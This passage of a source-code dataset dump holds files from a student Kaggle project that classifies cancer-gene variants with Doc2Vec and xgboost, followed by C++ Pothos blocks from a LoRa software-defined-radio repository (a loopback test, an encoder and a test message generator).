"alpha_fraction": 0.7502160668373108,
"alphanum_fraction": 0.7787381410598755,
"avg_line_length": 54.07143020629883,
"blob_id": "59cfef4f5236d5eb587966678dcc0476c79a6039",
"content_id": "8abb319e7159a6a94e2649ca024ee3fd4a5d32e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2314,
"license_type": "no_license",
"max_line_length": 214,
"num_lines": 42,
"path": "/readme.txt",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "This code is for Kaggle competition: Personalized Medicine: Redefining Cancer Treatment\nThe codes are based on Mr. Aly Osama's open source code \"Doc2Vec with Keras(0.77)\" and we try to improve the results by make several changes to it.\n\nThe codes are python based and it's organized as follows:\nThe data_load.py load csv data\nThe data_preprocessing.py do data cleaning\nThe word_embedding.py do doc embedding by Doc2Vec;\nThe word_embedding_load.py is another way to get doc embedding: we load the existed word embedding trained on PubMed by Chiu.(2016) and trained doc vector based on these vectors.\nThe classification.py trained a classification model on word embedding;(now we use NN)\nThe xgboost_classifier.py using the xgboost tree to do the classfication;(using word embedding as input)\nThe xgb_dataprecessing.py is the code of https://www.kaggle.com/the1owl/redefining-treatment-0-57456, which use transform and fit_transform to do data preprocessing (we use it as the baseline of our xgboost method)\nThe testaccuracy.py calculation the test accuracy by the classification model we just trained;\nThe load_test.py load the stage-2 data and test the accuracy;\nThe enhanced.py and enhanced_baseline.py is some method I used to try to enhance the result.\n\n\nFor the data:\ndocEmbeddings_5_clean is the doc embedding get from doc2vec and trained for 5 epoch;\ndocEmbeddings_30_clean is the doc embedding get from doc2vec and trained for 30 epoch;\ndocEmbeddings_5_load is the doc embedding get from doc2vec with loaded word embedding and trained for 5 epoch(windows = 2);\ndocEmbeddings_30_load is the doc embedding get from doc2vec with loaded word embedding and trained for 30 epoch(windows = 2);\ndocEmbeddings_30_loadwin30 is the doc embedding get from doc2vec with loaded word embedding and trained for 30 epoch(windows = 30);\ndocEmbeddings_30_loads2 is the doc emdedding for the seconde tage data\ndocEmbeddings_30_loadall is using all the labeled data(both training, 1st stage, 2nd stage test data) to train embedding\n\nThe pre-trained word embedding: \nhttps://drive.google.com/drive/folders/1h0vK_ZibfgCFH_XCHqKA0aZs3jlj-37m?usp=sharing\n\n\n###################################\n#below added by Quincy @2017/11/28\n###################################\nDependencies:\np7zip\nwget\nRe\ngensim\nPandas\nnltk\nnumpy\nkeras\ntensorflow\n\n"
},
{
"alpha_fraction": 0.6813187003135681,
"alphanum_fraction": 0.6978021860122681,
"avg_line_length": 13,
"blob_id": "658f1998e43d296a46de70fa05fbdaee2af23c00",
"content_id": "f7976216e94937a8db256c0469237e06300c11c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 13,
"path": "/UCLA-CS249-Project/README.md",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# Personalized-Medicine-Redefining-Cancer-Treatment\nUCLA-CS249-Project\n\n## Codes :\nAll codes in ./src/\n* util.py\n* demo.ipynb\n* baseline_classification.py\n...\n\n## Data :\n\n## Model :\n"
},
{
"alpha_fraction": 0.6273917555809021,
"alphanum_fraction": 0.6606243848800659,
"avg_line_length": 27.22857093811035,
"blob_id": "68db0114cadc738b8f30ed9914a4e1e84893136b",
"content_id": "cd924ef2bc39648bac832cb7d2ac3ebf2649c32a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 35,
"path": "/UCLA-CS249-Project/src/testaccuracy.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 23:13:01 2017\n\n@author: zhuya\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n#import classification as cl\n\ntest_solution = pd.read_csv(\"../data/stage_2_private_solution.csv\", sep = \",\")\ntest_id = test_solution['ID'].values\ntest_result = np.array(test_solution.drop('ID', axis = 1))\nactualsize = len(test_result)\n\npred = np.array(y_predict_final)\n\n#mysum = 0\nmyloss = 0\nfor i in range(actualsize):\n truth = np.argmax(test_result[i])\n #predict = np.argmax(pred[test_id[i]-1])\n #mysum += (truth == predict)\n myloss += -np.log(pred[test_id[i] - 1][truth])\n \n#accuracy = 100 * mysum / actualsize\naverageloss = myloss / actualsize\n\nprint(\"Test loss: %.2f \" % averageloss)\nsubmission = pd.DataFrame(pred)\nsubmission.insert(0, 'ID', test_x['ID'])\nsubmission.columns = ['ID','class1', 'class2', 'class3', 'class4', 'class5', 'class6', 'class7', 'class8', 'class9']\nsubmission.to_csv(\"submission_all.csv\",index=False)\nsubmission.head()\n\n\n\n\n\n"
},
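The scoring loop in testaccuracy.py computes the average multiclass log loss over the scored ids by hand; the same number can be cross-checked with scikit-learn (assumed available), reusing the script's variable names:

import numpy as np
from sklearn.metrics import log_loss

def average_log_loss(pred, test_id, test_result):
    truth = np.argmax(test_result, axis=1)  # true class per scored row
    return log_loss(truth, pred[test_id - 1], labels=list(range(9)))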
{
"alpha_fraction": 0.5684143304824829,
"alphanum_fraction": 0.6099744439125061,
"avg_line_length": 26.38596534729004,
"blob_id": "3c92512871125362f60a56427e09b6f64718ee49",
"content_id": "c37857e1133cce08f641c2445db21a589c436e75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1564,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 57,
"path": "/UCLA-CS249-Project/src/xgboost_classifier.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 20 10:43:19 2017\n\n@author: zhuya\n\"\"\"\n# this script using xgboost to do the prediction\n\nimport xgboost as xgb\nimport sklearn\nimport pandas as pd\nimport numpy as np\n\nfold = 5\nevallist = []\ndenom = 0\n\n#for i in range(len(train_y)):\n #train_y[i] -=1 \n \nfor i in range(fold):\n params = {\n 'eta': 0.03333,\n 'max_depth': 8,\n 'objective': 'multi:softprob',\n 'eval_metric': 'mlogloss',\n 'num_class': 9,\n 'seed': i,\n 'silent': True\n }\n x1,x2,y1,y2 = sklearn.model_selection.train_test_split(train_set, train_y, test_size = 0.18, random_state = i)\n watchlist = [(xgb.DMatrix(x1,y1), 'train'), (xgb.DMatrix(x2, y2), 'valid')]\n model = xgb.train(params, xgb.DMatrix(x1, y1), 1000, watchlist, verbose_eval=50, early_stopping_rounds=100)\n score1 = sklearn.metrics.log_loss(y2, model.predict(xgb.DMatrix(x2), ntree_limit=model.best_ntree_limit), labels = list(range(9)))\n print(score1)\n pred = model.predict(xgb.DMatrix(test_set), ntree_limit=model.best_ntree_limit+80)\n y_final = pred.copy()\n #if score < 0.9:\n if denom != 0:\n pred = model.predict(xgb.DMatrix(test_set), ntree_limit=model.best_ntree_limit+80)\n y_final += pred\n denom += 1\n \ny_final /= denom\ny_predict_final = y_final\n'''\n#enhanced\nn = 5\n\na = 0.25\ny_predict_final = np.zeros((test_size, 9))\ny_predict_final += y_final * (1 - a);\n\nfor i in range(test_size):\n for j in range(n):\n y_predict_final[i] += a/n * encoded_y[int(dic_test_id[i][j])]\n'''\n\n\n\n"
},
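The fold loop above is seed bagging: one xgboost model per random seed, with the test-set probabilities averaged across folds. The accumulation pattern in isolation, as a numpy sketch (helper name illustrative):

import numpy as np

def average_fold_predictions(per_fold_preds):
    """per_fold_preds: list of (n_test, 9) probability arrays, one per seed."""
    return np.mean(np.stack(per_fold_preds), axis=0)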
{
"alpha_fraction": 0.7238232493400574,
"alphanum_fraction": 0.7286263108253479,
"avg_line_length": 29.130434036254883,
"blob_id": "e66e751950d6e8e1992dde7a6b4211c73b68102c",
"content_id": "e3c4bbfde06cbd4a7c9a2a6fd81ff93a25e5499d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2082,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 69,
"path": "/UCLA-CS249-Project/src/feature_selection_evaluation.py",
"repo_name": "qqu0127/UCLA-CS249-Project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport tqdm\nimport string\nimport pandas as pd\nimport numpy as np\nimport util\nfrom sklearn.decomposition import TruncatedSVD\n#from data_preprocessing import *\nimport word_embedding_load as wel\nimport baseline_classification as bc\nimport matplotlib.pyplot as plt\n\nGENE_INPUT_DIM = 25\n\n\ndef runTextModelEval(textModelName = [], PATH = '../model/doc2vec/'):\n\t'''\n\tGiven a list of existed Text Model name, load them and get the baseline results one by one.\n\tBaseline evaluation please see baseline_classification.py\n\n\t@param:\n\t\ttextModelName, a list of TextModel name\n\t\tPATH, the path to the model TextModel folder, default set to be ../model/doc2vec/\n\t@return: null\n\n\t'''\n\n\t[all_data, train_size, test_size, train_x, train_y, test_x] = util.loadData()\n\tsentences = util.data_preprocess(all_data)\n\tsvd = TruncatedSVD(n_components=GENE_INPUT_DIM, random_state=12)\n\tfor textModel in textModelName:\n\n\t\ttry:\n\t\t\tmodel = wel.loadTextModel(PATH + textModel)\n\t\texcept:\n\t\t\tprint('Failed on ' + textModel)\n\t\t\tcontinue\n\t\tif model == None:\n\t\t\tprint('Failed on ' + textModel)\n\t\t\tcontinue\n\t\ttext_train_arrays, text_test_arrays = wel.getTextVec(model, train_size, test_size, 200)\n\t\ttruncated_one_hot_gene = wel.getGeneVec(all_data, svd)\n\t\ttruncated_one_hot_variation = wel.getVariationVec(all_data, svd)\n\t\ttrain_set = np.hstack((truncated_one_hot_gene[:train_size], truncated_one_hot_variation[:train_size], text_train_arrays))\n\t\ttest_set = np.hstack((truncated_one_hot_gene[train_size:], truncated_one_hot_variation[train_size:], text_test_arrays))\n\t\tencoded_y = pd.get_dummies(train_y)\n\t\tencoded_y = np.array(encoded_y)\n\n\t\tX = np.array(train_set)\n\t\ty = np.array(bc.getLabels(encoded_y))\n\t\tprint('Results for TextModel: ' + textModel)\n\t\tcm = bc.baseline(X, y)\n\n#TODO!\ndef runFeatLenEval(textModel, featLen = []):\n\t'''\n\tGiven textModel and a list of feature length, conduct truncated SVD to reduce the length of feature vector.\n\tThen running baseline evalution, please also see baseline_classification.py\n\n\t@param:\n\n\n\t'''\n\t\n\treturn\n\t\t\n"
}
] | 7 |
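feature_selection_evaluation.py reduces one-hot gene and variation indicators to 25-dimensional codes with truncated SVD before concatenating them with the 200-dimensional text vectors. A sketch of that reduction (pandas and scikit-learn assumed; getGeneVec/getVariationVec in word_embedding_load.py are not shown in this section, so the helper here is illustrative):

import pandas as pd
from sklearn.decomposition import TruncatedSVD

def one_hot_svd(series, dim=25, seed=12):
    one_hot = pd.get_dummies(series)  # (N, n_categories) indicator matrix
    svd = TruncatedSVD(n_components=dim, random_state=seed)
    return svd.fit_transform(one_hot)  # dense (N, dim) codes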
myriadrf/LoRa-SDR | https://github.com/myriadrf/LoRa-SDR | e3834f10b3591766395595acb507f98cc713e469 | c545c51e5e37284363a971ec298f72255646a6fa | 4c1f8fdec211bbd9e1dfb8ff560ca60cd9c43431 | refs/heads/master | 2021-06-11T03:33:02.681983 | 2021-03-01T09:34:12 | 2021-03-01T09:34:12 | 60,247,628 | 207 | 48 | null | 2016-06-02T08:46:11 | 2018-06-09T18:17:04 | 2018-06-10T12:48:43 | C++ | [
{
"alpha_fraction": 0.5742513537406921,
"alphanum_fraction": 0.592585027217865,
"avg_line_length": 35.90977478027344,
"blob_id": "ca31cc6a722849a66af99116fb91ad1a927cda5c",
"content_id": "8eb8fa4fda225aa6a83ddbf0a4632702010a4fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4909,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 133,
"path": "/TestLoopback.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2018 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Testing.hpp>\n#include <Pothos/Framework.hpp>\n#include <Pothos/Proxy.hpp>\n#include <Pothos/Remote.hpp>\n#include <iostream>\n#include \"LoRaCodes.hpp\"\n#include <json.hpp>\n\nusing json = nlohmann::json;\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_encoder_to_decoder)\n{\n auto env = Pothos::ProxyEnvironment::make(\"managed\");\n auto registry = env->findProxy(\"Pothos/BlockRegistry\");\n\n auto feeder = registry.call(\"/blocks/feeder_source\", \"uint8\");\n auto encoder = registry.call(\"/lora/lora_encoder\");\n auto decoder = registry.call(\"/lora/lora_decoder\");\n auto collector = registry.call(\"/blocks/collector_sink\", \"uint8\");\n\n std::vector<std::string> testCodingRates;\n testCodingRates.push_back(\"4/4\");\n testCodingRates.push_back(\"4/5\");\n testCodingRates.push_back(\"4/6\");\n testCodingRates.push_back(\"4/7\");\n testCodingRates.push_back(\"4/8\");\n\n for (size_t SF = 7; SF <= 12; SF++)\n {\n std::cout << \"Testing SF \" << SF << std::endl;\n for (const auto &CR : testCodingRates)\n {\n std::cout << \" with CR \" << CR << std::endl;\n encoder.call(\"setSpreadFactor\", SF);\n decoder.call(\"setSpreadFactor\", SF);\n encoder.call(\"setCodingRate\", CR);\n decoder.call(\"setCodingRate\", CR);\n\n //create a test plan\n json testPlan;\n testPlan[\"enablePackets\"] = true;\n testPlan[\"minValue\"] = 0;\n testPlan[\"maxValue\"] = 255;\n auto expected = feeder.call(\"feedTestPlan\", testPlan.dump());\n\n //create tester topology\n {\n Pothos::Topology topology;\n topology.connect(feeder, 0, encoder, 0);\n topology.connect(encoder, 0, decoder, 0);\n topology.connect(decoder, 0, collector, 0);\n topology.commit();\n POTHOS_TEST_TRUE(topology.waitInactive());\n //std::cout << topology.queryJSONStats() << std::endl;\n }\n\n std::cout << \"verifyTestPlan\" << std::endl;\n collector.call(\"verifyTestPlan\", expected);\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_loopback)\n{\n auto env = Pothos::ProxyEnvironment::make(\"managed\");\n auto registry = env->findProxy(\"Pothos/BlockRegistry\");\n\n const size_t SF = 10;\n auto feeder = registry.call(\"/blocks/feeder_source\", \"uint8\");\n auto encoder = registry.call(\"/lora/lora_encoder\");\n auto mod = registry.call(\"/lora/lora_mod\", SF);\n auto adder = registry.call(\"/comms/arithmetic\", \"complex_float32\", \"ADD\");\n auto noise = registry.call(\"/comms/noise_source\", \"complex_float32\");\n auto demod = registry.call(\"/lora/lora_demod\", SF);\n auto decoder = registry.call(\"/lora/lora_decoder\");\n auto collector = registry.call(\"/blocks/collector_sink\", \"uint8\");\n\n std::vector<std::string> testCodingRates;\n //these first few dont have error correction\n //testCodingRates.push_back(\"4/4\");\n //testCodingRates.push_back(\"4/5\");\n //testCodingRates.push_back(\"4/6\");\n testCodingRates.push_back(\"4/7\");\n testCodingRates.push_back(\"4/8\");\n\n for (const auto &CR : testCodingRates)\n {\n std::cout << \"Testing with CR \" << CR << std::endl;\n\n encoder.call(\"setSpreadFactor\", SF);\n decoder.call(\"setSpreadFactor\", SF);\n encoder.call(\"setCodingRate\", CR);\n decoder.call(\"setCodingRate\", CR);\n mod.call(\"setAmplitude\", 1.0);\n noise.call(\"setAmplitude\", 4.0);\n noise.call(\"setWaveform\", \"NORMAL\");\n mod.call(\"setPadding\", 512);\n demod.call(\"setMTU\", 512);\n\n //create a test plan\n json testPlan;\n testPlan[\"enablePackets\"] = true;\n testPlan[\"minValue\"] = 0;\n 
testPlan[\"maxValue\"] = 255;\n testPlan[\"minBuffers\"] = 5;\n testPlan[\"maxBuffers\"] = 5;\n testPlan[\"minBufferSize\"] = 8;\n testPlan[\"maxBufferSize\"] = 128;\n auto expected = feeder.call(\"feedTestPlan\", testPlan.dump());\n\n //create tester topology\n {\n Pothos::Topology topology;\n topology.connect(feeder, 0, encoder, 0);\n topology.connect(encoder, 0, mod, 0);\n topology.connect(mod, 0, adder, 0);\n topology.connect(noise, 0, adder, 1);\n topology.connect(adder, 0, demod, 0);\n topology.connect(demod, 0, decoder, 0);\n topology.connect(decoder, 0, collector, 0);\n topology.commit();\n POTHOS_TEST_TRUE(topology.waitInactive(0.1, 0));\n //std::cout << topology.queryJSONStats() << std::endl;\n }\n\n std::cout << \"decoder dropped \" << decoder.call<unsigned long long>(\"getDropped\") << std::endl;\n std::cout << \"verifyTestPlan\" << std::endl;\n collector.call(\"verifyTestPlan\", expected);\n }\n}\n"
},
{
"alpha_fraction": 0.6055105924606323,
"alphanum_fraction": 0.631888210773468,
"avg_line_length": 30.257143020629883,
"blob_id": "470e09af398448384c9c3d06b604e4ad71a601b5",
"content_id": "384489b37ca4b6b8468d8b1fec5fe2e7c3057250",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7658,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 245,
"path": "/LoRaEncoder.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// Copyright (c) 2016-2016 Arne Hennig\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <cstring>\n#include \"LoRaCodes.hpp\"\n\n/***********************************************************************\n * |PothosDoc LoRa Encoder\n *\n * Encode bytes into LoRa modulation symbols.\n * This is a simple encoder and does not offer many options.\n * The job of the encoder is to scramble, add error correction,\n * interleaving, and gray decoded to handle measurement error.\n *\n * <h2>Input format</h2>\n *\n * A packet message with a payload containing bytes to transmit.\n *\n * <h2>Output format</h2>\n *\n * A packet message with a payload containing LoRa modulation symbols.\n * The format of the packet payload is a buffer of unsigned shorts.\n * A 16-bit short can fit all size symbols from 7 to 12 bits.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |param sf[Spread factor] The spreading factor sets the bits per symbol.\n * |default 10\n *\n * |param ppm[Symbol size] The size of the symbol set (_ppm <= SF).\n * Specify _ppm less than the spread factor to use a reduced symbol set.\n * The special value of zero uses the full symbol set (PPM == SF).\n * |default 0\n * |option [Full set] 0\n * |widget ComboBox(editable=true)\n * |preview valid\n *\n * |param cr[Coding Rate] The number of error correction bits.\n * |option [4/4] \"4/4\"\n * |option [4/5] \"4/5\"\n * |option [4/6] \"4/6\"\n * |option [4/7] \"4/7\"\n * |option [4/8] \"4/8\"\n * |default \"4/8\"\n *\n * |param explicit Enable/disable explicit header mode.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param crc Enable/disable crc.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param whitening Enable/disable whitening of the input message.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |factory /lora/lora_encoder()\n * |setter setSpreadFactor(sf)\n * |setter setSymbolSize(ppm)\n * |setter setCodingRate(cr)\n * |setter enableExplicit(explicit)\n * |setter enableCrc(crc)\n * |setter enableWhitening(whitening)\n **********************************************************************/\nclass LoRaEncoder : public Pothos::Block\n{\npublic:\n\tLoRaEncoder(void) :\n\t\t_sf(10),\n\t\t_ppm(0),\n\t\t_rdd(4),\n\t\t_explicit(true),\n\t\t_crc(true),\n\t\t_whitening(true)\n\t{\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, setSpreadFactor));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, setSymbolSize));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, setCodingRate));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, enableWhitening));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, enableExplicit));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, enableCrc));\n\t\tthis->setupInput(\"0\");\n\t\tthis->setupOutput(\"0\");\n\t}\n\n\tstatic Block *make(void)\n\t{\n\t\treturn new LoRaEncoder();\n\t}\n\n\tvoid setSpreadFactor(const size_t sf)\n\t{\n\t\t_sf = sf;\n\t}\n\n\tvoid setSymbolSize(const size_t ppm)\n\t{\n\t\t_ppm = ppm;\n\t}\n\n\tvoid setCodingRate(const std::string &cr)\n\t{\n\t\tif (cr == \"4/4\") _rdd = 0;\n\t\telse if (cr == \"4/5\") _rdd = 1;\n\t\telse if (cr == \"4/6\") _rdd = 2;\n\t\telse if (cr == \"4/7\") _rdd = 3;\n\t\telse if (cr == \"4/8\") _rdd = 4;\n\t\telse throw Pothos::InvalidArgumentException(\"LoRaEncoder::setCodingRate(\" + cr + \")\", \"unknown coding 
rate\");\n\t}\n\n\tvoid enableWhitening(const bool whitening)\n\t{\n\t\t_whitening = whitening;\n\t}\n\n\tvoid enableExplicit(const bool __explicit) {\n\t\t_explicit = __explicit;\n\t}\n\n\tvoid enableCrc(const bool crc) {\n\t\t_crc = crc;\n\t}\n\n\tvoid encodeFec(std::vector<uint8_t> &codewords, const size_t RDD, size_t &cOfs, size_t &dOfs, const uint8_t *bytes, const size_t count) {\n\t\tif (RDD == 0) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = bytes[dOfs >> 1] >> 4;\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = bytes[dOfs >> 1] & 0xf;\n\t\t} else if (RDD == 1) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = encodeParity54(bytes[dOfs >> 1] >> 4);\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = encodeParity54(bytes[dOfs >> 1] & 0xf);\n\t\t} else if (RDD == 2) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = encodeParity64(bytes[dOfs >> 1] >> 4);\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = encodeParity64(bytes[dOfs >> 1] & 0xf);\n\t\t} else if (RDD == 3) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = encodeHamming74sx(bytes[dOfs >> 1] >> 4);\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = encodeHamming74sx(bytes[dOfs >> 1] & 0xf);\n\t\t} else if (RDD == 4) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = encodeHamming84sx(bytes[dOfs >> 1] >> 4);\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = encodeHamming84sx(bytes[dOfs >> 1] & 0xf);\n\t\t}\n\t}\n\n\tvoid work(void) {\n\t\tauto inPort = this->input(0);\n\t\tauto outPort = this->output(0);\n\t\tif (not inPort->hasMessage()) return;\n\t\tconst size_t PPM = (_ppm == 0) ? _sf : _ppm;\n\t\tif (PPM > _sf) throw Pothos::Exception(\"LoRaEncoder::work()\", \"failed check: PPM <= SF\");\n\n\t\t//extract the input bytes\n\t\tauto msg = inPort->popMessage();\n\t\tauto pkt = msg.extract<Pothos::Packet>();\n\t\tsize_t payloadLength = pkt.payload.length + (_crc ? 2 : 0);\n\t\tstd::vector<uint8_t> bytes(payloadLength);\n\t\tstd::memcpy(bytes.data(), pkt.payload.as<const void *>(), pkt.payload.length);\n\t\t\t\t\n\t\tconst size_t numCodewords = roundUp(bytes.size() * 2 + (_explicit ? N_HEADER_CODEWORDS:0), PPM);\n\t\tconst size_t numSymbols = N_HEADER_SYMBOLS + (numCodewords / PPM - 1) * (4 + _rdd);\t\t// header is always coded with 8 bits\n\t\t\n\t\tsize_t cOfs = 0;\n\t\tsize_t dOfs = 0;\n\t\tstd::vector<uint8_t> codewords(numCodewords);\n\n\t\tif (_crc) {\n\t\t\tuint16_t crc = sx1272DataChecksum(bytes.data(), pkt.payload.length);\n\t\t\tbytes[pkt.payload.length] = crc & 0xff;\n\t\t\tbytes[pkt.payload.length+1] = (crc >> 8) & 0xff;\n\t\t}\n\n\t\tif (_explicit) {\n\t\t\tstd::vector<uint8_t> hdr(3);\n\t\t\tuint8_t len = pkt.payload.length;\n\t\t\thdr[0] = len;\n\t\t\thdr[1] = (_crc ? 
1 : 0) | (_rdd << 1);\n\t\t\thdr[2] = headerChecksum(hdr.data());\n\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[0] >> 4);\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[0] & 0xf);\t// length\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[1] & 0xf);\t// crc / fec info\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[2] >> 4);\t\t// checksum\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[2] & 0xf);\n\t\t}\n\t\tsize_t cOfs1 = cOfs;\n\t\tencodeFec(codewords, 4, cOfs, dOfs, bytes.data(), PPM - cOfs);\n\t\tif (_whitening) {\n\t\t\tSx1272ComputeWhitening(codewords.data() + cOfs1, PPM - cOfs1, 0, HEADER_RDD);\n\t\t}\n\n\t\tif (numCodewords > PPM) {\n\t\t\tsize_t cOfs2 = cOfs;\n\t\t\tencodeFec(codewords, _rdd, cOfs, dOfs, bytes.data(), numCodewords-PPM);\n\t\t\tif (_whitening) {\n\t\t\t\tSx1272ComputeWhitening(codewords.data() + cOfs2, numCodewords - PPM, PPM - cOfs1, _rdd);\n\t\t\t}\n\t\t}\n\n\t\t//interleave the codewords into symbols\n\t\tstd::vector<uint16_t> symbols(numSymbols);\n\t\tdiagonalInterleaveSx(codewords.data(), PPM, symbols.data(), PPM, HEADER_RDD);\n\t\tif (numCodewords > PPM) {\n\t\t\tdiagonalInterleaveSx(codewords.data() + PPM, numCodewords-PPM, symbols.data()+N_HEADER_SYMBOLS, PPM, _rdd);\n\t\t}\n\n\t\t//gray decode, when SF > PPM, pad out LSBs\n\t\tfor (auto &sym : symbols){\n\t\t\tsym = grayToBinary16(sym);\n\t\t\tsym <<= (_sf - PPM);\n\t\t}\n\n\t\t//post the output symbols\n\t\tPothos::Packet out;\n\t\tout.payload = Pothos::BufferChunk(typeid(uint16_t), symbols.size());\n\t\tstd::memcpy(out.payload.as<void *>(), symbols.data(), out.payload.length);\n\t\toutPort->postMessage(out);\n\t}\n\nprivate:\n size_t _sf;\n size_t _ppm;\n\tsize_t _rdd;\n\tbool _explicit;\n\tbool _crc;\n bool _whitening;\n};\n\nstatic Pothos::BlockRegistry registerLoRaEncoder(\n \"/lora/lora_encoder\", &LoRaEncoder::make);\n"
},
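The encoder above protects each nibble with the sx1272-flavoured Hamming(8,4) from LoRaCodes.hpp. Transcribed to Python for inspection, with a check that the code's minimum distance supports single-bit correction:

def encode_hamming84sx(x):
    d0, d1, d2, d3 = (x >> 0) & 1, (x >> 1) & 1, (x >> 2) & 1, (x >> 3) & 1
    b = x & 0xF
    b |= (d0 ^ d1 ^ d2) << 4
    b |= (d1 ^ d2 ^ d3) << 5
    b |= (d0 ^ d1 ^ d3) << 6
    b |= (d0 ^ d2 ^ d3) << 7
    return b

codewords = [encode_hamming84sx(v) for v in range(16)]
# distance >= 3 is what makes single-bit correction possible (here it is 4)
assert min(bin(a ^ b).count("1")
           for a in codewords for b in codewords if a != b) >= 3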
{
"alpha_fraction": 0.5293624401092529,
"alphanum_fraction": 0.5411073565483093,
"avg_line_length": 21.923076629638672,
"blob_id": "d978394309aa15931a35e92396b6be01c4dda144",
"content_id": "85ccc586c5cba95a68cbcf9ccf3e20dd82f976b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 52,
"path": "/TestGen.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <cstring>\n\n/***********************************************************************\n * |PothosDoc LoRa Test Gen\n *\n * Generate test messages for the LoRa encoder for testing purposes.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |factory /lora/test_gen()\n **********************************************************************/\nclass TestGen : public Pothos::Block\n{\npublic:\n TestGen(void)\n {\n this->setupOutput(0);\n }\n\n static Block *make(void)\n {\n return new TestGen();\n }\n\n void activate(void)\n {\n _count = 0;\n }\n\n void work(void)\n {\n auto msgStr = std::to_string(_count++);\n Pothos::BufferChunk msgBuff(typeid(uint8_t), msgStr.size());\n std::memcpy(msgBuff.as<void *>(), msgStr.data(), msgStr.size());\n Pothos::Packet outPkt;\n outPkt.payload = msgBuff;\n this->output(0)->postMessage(outPkt);\n }\n\nprivate:\n //configuration\n unsigned long long _count;\n};\n\nstatic Pothos::BlockRegistry registerTestGen(\n \"/lora/test_gen\", &TestGen::make);\n"
},
{
"alpha_fraction": 0.41178640723228455,
"alphanum_fraction": 0.47093966603279114,
"avg_line_length": 33.41116714477539,
"blob_id": "87b5bbad9ddbf602a02e985c31801077ad100697",
"content_id": "1961f8599b3214a0bcea7bbf17053759f5a09fdd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 13558,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 394,
"path": "/LoRaCodes.hpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
